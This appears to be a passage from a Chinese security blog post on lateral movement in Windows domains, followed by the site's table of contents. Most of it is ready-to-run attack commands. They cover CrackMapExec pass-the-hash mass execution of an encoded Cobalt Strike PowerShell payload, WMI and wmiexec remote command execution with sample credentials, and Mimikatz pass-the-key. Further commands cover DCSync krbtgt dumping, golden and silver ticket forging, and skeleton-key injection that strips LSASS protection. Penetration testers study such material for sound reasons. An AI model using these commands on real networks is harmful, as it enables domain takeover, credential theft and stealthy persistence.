cme smb 10.73.147.90 10.73.147.88 -u administrator -H 852a844adfce18f66009b4f14e0a98de

批量执行命令:

cme smb 10.73.147.90 10.73.147.88 -u administrator -H 852a844adfce18f66009b4f14e0a98de  -x "whoami"

或者执行powershell,我们可以通过CS的powershell command然后粘贴生成的payload.txt中的内容直接-x执行即可批量上马。

cme smb 10.211.55.51  10.211.55.52 -u administrator  -H 852a844adfce18f66009b4f14e0a98de -x "powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0..."

WMI 横向

WMI的全名为“Windows Management Instrumentation”。从Windows 98开始，Windows操作系统都支持WMI。WMI是由一系列工具集组成的，可以通过/node选项使用端口135上的远程过程调用(RPC)进行通信以进行远程访问，它允许系统管理员远程执行自动化管理任务，例如远程启动服务或执行命令。

“自从PsExec在内网中被严格监控后，越来越多的反病毒厂商将PsExec加入了黑名单，于是攻击者逐渐开始使用WMI进行横向移动。通过渗透测试发现，在使用wmiexec进行横向移动时，Windows操作系统默认不会将WMI的操作记录在日志中，同时攻击脚本无需写入到磁盘，具有极高的隐蔽性。因为在这个过程中不会产生日志，所以，对网络管理员来说增加了攻击溯源的成本。而对攻击者来说，其恶意行为被发现的可能性有所降低、隐蔽性有所提高。由此，越来越多的APT开始使用WMI进行攻击，利用WMI可以进行信息收集、探测、反病毒、虚拟机检测、命令执行、权限持久化等操作。”

使用条件

1、WMI服务开启，端口135，默认开启。

2、防火墙允许135、445等端口通信。

3、知道目标机的账户密码。

执行命令：

wmic /node:191.168.52.136 /user:xxxx /password:xxxxx  process call create "cmd.exe /c ipconfig>d:\result.txt"
//无需上传第三方软件，利用系统内置程序,单命令执行，执行后无结果回显

WMI常用命令

https://www.freebuf.com/articles/246440.html

文件管理

wmic fsdir where "drive='c:' and filename='whoami'" list

wmic fsdir "c:\\test" call delete
//删除C盘下的test目录，注意“\”要进行一下转义

wmic process where “NOT ExecutablePath LIKE ‘%Windows%’” GET ExecutablePath
//枚举出整个系统中的所有可执行文件

for /f "skip=1 tokens=1*" %i in ('wmic datafile where "FileName='qq' and extension='exe'" get drive^,path') do (set "qPath=%i%j"&@echo %qPath:~0,-3%)
//wmic 全盘搜索某文件并获取该文件所在目录

环境变量

wmic environment get Description, VariableValue

wmic environment where "name='temp'" get UserName,VariableValue
//环境变量，获取temp环境变量

wmic environment where "name='path' and username='<system>'" set VariableValue="%path%;c:\whoami"
//更改PATH环境变量值，新增c:\whoami

进程管理

wmic process list brief
//列出所有进程信息

wmic process get processid,name,executablepath 
//Full显示所有、Brief显示摘要、Instance显示实例、Status显示状态

wmic process where name="vmtoolsd.exe" get executablepath
//获取指定进程可执行文件的路径

wmic process call create "C:\windows\system32\notepad.exe"
//创建进程

wmic process call create "cmd.exe /c 'ipconfig'"
wmic process call create "shutdown.exe -r -f -t 60"
//根据系统命令创建进程

wmic process where name="notepad.exe" delete
wmic process where pid="244" delete 
//删除进程

用户账户管理

wmic useraccount
wmic useraccount list brief

wmic useraccount where "name='%UserName%'" call rename newUserName
// 更改当前用户名
wmic useraccount where "name='Administrator'" call Rename admin
// 更改指定用户名

获取补丁信息

wmic qfe list brief
wmic qfe get Caption,Description,HotFixID,IntsalledOn

查看域控制器

wmic ntdomain list brief

查看安装的软件信息

wmic product get name,version

远程桌面连接使用WMIC命令开启远程计算机的远程桌面连接：

1
2

wmic /node:192.168.52.138 /USER:administrator PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1
// wmic /node:"[full machine name]" /USER:"[domain]\[username]" PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1

共享管理

wmic share list brief
wmic share get name,path,status

wmic share call create "","test","3","TestShareName","","c:\whoami",0
(可使用 WMIC SHARE CALL Create /? 查看create后的参数类型)
// 建立共享

wmic share where "name='C$'" call delete
wmic share where "path='c:\test'" delete
// 删除共享

wmiexec

要执行命令并回显请使用wmiexec.py，⽤445端口传回显：

1
2

python wmiexec.py administrator:Liu78963@192.168.183.130
// python wmiexec.py 用户名:密码@目标IP

指定-hashes选项的话，则可进行哈希传递。

exe版本命令与wmiexec.py一模一样。在跳板机上上传wmiexec.exe并运行如下命令获取目标系统192.168.52.138的shell：

`1`	`wmiexec.exe administrator:Liu78963@192.168.183.130`

wmiexec.vbs

https://github.com/Twi1ight/AD-Pentest-Script/blob/master/wmiexec.vbs

wmiexec.vbs脚本通过VBS调用WMI来模拟PsExec的功能。其可以在远程系统中执行命令并进行回显，获取远程主机的半交互式Shell。

wmiexec.vbs支持两种模式，一种是半交互式shell模式，另一种是执行单条命令模式。

PTK-密钥传递

即 Pass The Key ，当系统安装了 KB2871997 补丁且禁用了 NTLM 的时候，那我们抓取到的 ntlm hash. 也就失去了作用，但是可以通过 pass the key 的攻击方式获得权限。

利用条件

1、目标主机打过KB2871997

2、所以必须使用SID值为500的用户

mimikatz sekurlsa::ekeys
//获取用户的aes key
sekurlsa::pth /user:xxx /domain:xxx /aes256:xxxxxxxx"
//注入aes key，成功后会返回一个cmd

PTT-票据传递

MS14-068

利用条件

1.域控没有打MS14-068的补丁(KB3011780)

2.拿下一台加入域的计算机，并且能dump出某一域成员的用户名，密码，SID等值

域用户hack在域成员主机A上登录过，域成员主机A的管理员通过mimikatz得到了域用户hack的用户名，密码，SID等值，而且域控存在MS14-068漏洞，现在域成员主机A想通过MS14-068漏洞访问域控。

https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

https://www.cnblogs.com/-mo-/p/11890539.html

https://www.cnblogs.com/yuzly/p/10859520.html

黄金票据

利用条件

1.域名称

2.域的SID值

3.域的KRBTGT账户密码HASH（通常需要SYSTEM权限才能dump）

4.伪造用户名，可以是任意的

kerberos协议原理参考

NTML认证与kerberos认证与PAC相关知识

域中每个用户的 Ticket 都是由 krbtgt 的密码 Hash 来计算生成的，因此只要获取到了 krbtgt 用户的密码 Hash ，就可以随意伪造 Ticket ，进而使用 Ticket 登陆域控制器，使用 krbtgt 用户 hash 生成的票据被称为 Golden Ticket，此类攻击方法被称为票据传递攻击。

首先获取krbtgt的用户hash:

`1`	`mimikatz "lsadump::dcsync /domain:xx.com /user:krbtgt"`

利用 mimikatz 生成域管权限的 Golden Ticket，填入对应的域管理员账号、域名称、sid值，如下：

kerberos::golden /admin:administrator /domain:ABC.COM /sid:S-1-5-21-3912242732-2617380311-62526969 /krbtgt:c7af5cfc450e645ed4c46daa78fe18da /ticket:test.kiribi


kerberos::ptt test.kiribi #导入刚才生成的票据


dir \\dc.abc.com\c$  #导入成功后可获取域管权限

白银票据

利用条件

1.域名称

2.域的SID值

3.域中的Server服务器账户的NTLM-Hash

4.伪造的用户名，可以是任意用户名.

5.目标服务器上面需要访问的kerberos服务

可以伪造的服务

服务名称	同时需要的服务
WMI	HOST RPCSS
PowerShell Remoting	HOST HTTP
WinRM	HOST HTTP
Scheduled Tasks	HOST
Windows File Share (CIFS)	CIFS
LDAP operations includingMimikatz DCSync	LDAP
Windows Remote Server Administration Tools	RPCSS LDAP CIFS

服务说明：

Silver Ticket连接到具有管理员权限Windows计算机上的WMI 为“ HOST ”服务和“ rpcss ”服务创建白银票据以使用WMI在目标系统上远程执行命令。
Silver Ticket连接到以Windows管理员权限计算机上的PowerShell远程执行

为“ http ”服务和“ wsman ”服务创建Silver Ticket，以获得目标系统上的WinRM和或PowerShell Remoting的管理权限。
具有管理员权限的Windows计算机（HOST）的Silver Ticket

创建银票以获得目标计算机上所涵盖的任何Windows服务的管理员权限。这包括修改和创建计划任务的权限。

注入两张HTTP＆WSMAN白银票据后，我们可以使用PowerShell远程（或WinRM的）反弹出目标系统shell。首先New-PSSession使用PowerShell创建到远程系统的会话的PowerShell cmdlet，然后Enter-PSSession打开远程shell。
Windows共享（CIFS）管理访问的Silver Ticket

为 “cifs ”服务创建白银票据，以获得目标计算机上任何Windows共享的管理权限。

注入CIFS Silver Ticket后，我们现在可以访问目标计算机上的任何共享，包括c$共享，我们能够将文件拷贝到共享文件中。
Silver Ticket连接到具有管理员权限Windows计算机上的LDAP 为"ldap"服务创建Silver Ticket 以获得目标系统（包括Active Directory）上LDAP服务的管理权限。

利用LDAP Silver Ticket，我们可以远程访问LDAP服务来获得krbtgt的信息

步骤(伪造CIFS的白银票据)：

1.获取hash sid等信息

`1`	`mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > 1.txt`

2.伪造白银票据

kerberos::golden /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /target:OWA2010SP3.0day.org /service:cifs /rc4:125445ed1d553393cce9585e64e3fa07 /user:silver /ptt

参数说明：

/domain：当前域名称
/sid：SID值，和金票一样取前面一部分
/target：目标主机，这里是OWA2010SP3.0day.org
/service：服务名称，这里需要访问共享文件，所以是cifs
/rc4：目标主机的HASH值
/user：伪造的用户名
/ptt：表示的是Pass TheTicket攻击，是把生成的票据导入内存，也可以使用/ticket导出之后再使用kerberos::ptt来导入

这时通过klist查看当前会话的kerberos票据可以看到生成的票据。

使用dir \\OWA2010SP3.0day.org\c$访问DC的共享文件夹。

skeleton key

skeleton key(万能钥匙)就是给所有域内用户添加一个相同的密码，域内所有的用户都可以使用这个密码进行认证，同时原始密码也可以使用，其原理是对 lsass.exe 进行注入，所以重启后会失效。

#在域控上安装 skeleton key
mimikatz.exe privilege::debug "misc::skeleton"

#在域内其他机器尝试使用 skeleton key 去访问域控，添加的密码是 mimikatz
net use \\WIN-9P499QKTLDO.adtest.com\c$ mimikatz /user:adtest\administrator`

微软在 2014 年 3 月 12 日添加了 LSA 爆护策略，用来防止对进程 lsass.exe 的代码注入。如果直接尝试添加 skelenton key 会失败。

#适用系统
windows 8.1
windows server 2012 及以上`

当然 mimikatz 依旧可以绕过，该功能需要导入mimidrv.sys文件，导入命令如下:

privilege::debug
!+
!processprotect /process:lsass.exe /remove 
misc::skeleton`

NTLM中继

挖坑，待补

参考

浅探内网横向移动-Pass The Hash

内网横向移动：利用WMI来渗透

内网渗透之IPC$入侵

浅析黄金票据与白银票据

wh1sper

从0开始的Windows配环境之旅

重装Windows

配置各种环境

对抗国产流氓软件

火绒高级防护

根治流氓软件

小结

Docker下PHP调试环境搭建

Xdebug的原理

使用DBGp 代理进行多用户调试﻿

宿主机无法收到Xdebug请求

使用Dockerfile和Docker compose

配置PhpStorm

Reference

应急响应笔记

Linux

敏感目录

网络连接与进程

登录与用户

历史命令

计划任务

启动项、预加载文件

Windows

网络连接

敏感目录

后门帐号

启动项

计划任务、服务

Tomcat WebSocket内存马原理浅析

Tomcat WebSocket的实现

服务端实现Endpoint的方式

注解方式：@ServerEndpoint

继承抽象类：Endpoint

Tomcat WebSocket的加载

Tomcat WebSocket内存马的实现

demo

WebSocket内存马的检测方法

参考

内网横向移动方法

IPC连接

用IPC进行文件目录操作

IPC常见错误号

Windows计划任务

Windows服务

通过smb服务横向移动

明文传递

PsExec.exe(微软官方工具)

PTH-哈希传递

psexec.py-PTH

smbexec.py

wmiexec.py-PTH

MiMiKatz-PTH

pth批量横向移动

WMI 横向

WMI常用命令

wmiexec

wmiexec.vbs

PTK-密钥传递

PTT-票据传递

MS14-068

黄金票据

白银票据

skeleton key

NTLM中继

参考

使用DBGp 代理进行多用户调试